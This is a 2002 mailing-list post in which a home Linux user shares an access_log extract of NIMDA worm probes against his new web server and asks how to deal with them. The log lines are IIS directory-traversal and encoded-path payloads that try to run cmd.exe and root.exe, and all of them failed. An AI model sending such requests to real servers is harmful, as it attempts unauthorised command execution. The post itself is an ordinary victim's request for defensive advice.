[plug] Anyone seen this particular attack pattern before?

Alan Graham alan.graham at infonetsystems.com.au
Thu Jan 17 11:17:32 WST 2002


Apologies, I should have done more research.  It's NIMDA.

Anyone have an answer to NIMDA?  Or is it just something we have to put up
with until it dies out?  I'm getting a few hundred hits a day.

Alan
----- Original Message -----
From: Alan Graham <alan.graham at infonetsystems.com.au>
To: <plug at plug.linux.org.au>
Sent: Thursday, January 17, 2002 11:03 AM
Subject: [plug] Anyone seen this particular attack pattern before?


> I've just set up a web server on my firewall, to show some photo's of the
> kids to my folks in England.  Within a few days, I started seeing this
> attack.  It comes in regularly, from a lot of different IP's, and it's
> obviously aimed at NT IIS.  Ha.  I'm thinking it's a well known scripted
> attack, or posibly a zombied attack?  There's a pause of about 5 minutes
> between each attack.  The pisser is that most of the hosts appear to be
> within iinet.  I suppose I'd better let them know too.
>
> Can anyone tell me any more about it?
>
> Extract of access_log
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
"-"
> "-"
> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 321 "-" "-"
> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 321 "-" "-"
> "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
"-"
> "-"
> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
"-"
> "-"
> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
"-"
> "-"
> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
"-"
> "-"
> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
> "-" "-"
> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
"-"
> "-"
> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
304
> "-" "-"
> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
"-"
> "-"
>
> Regards
>
> Alan Graham
>
>



More information about the plug mailing list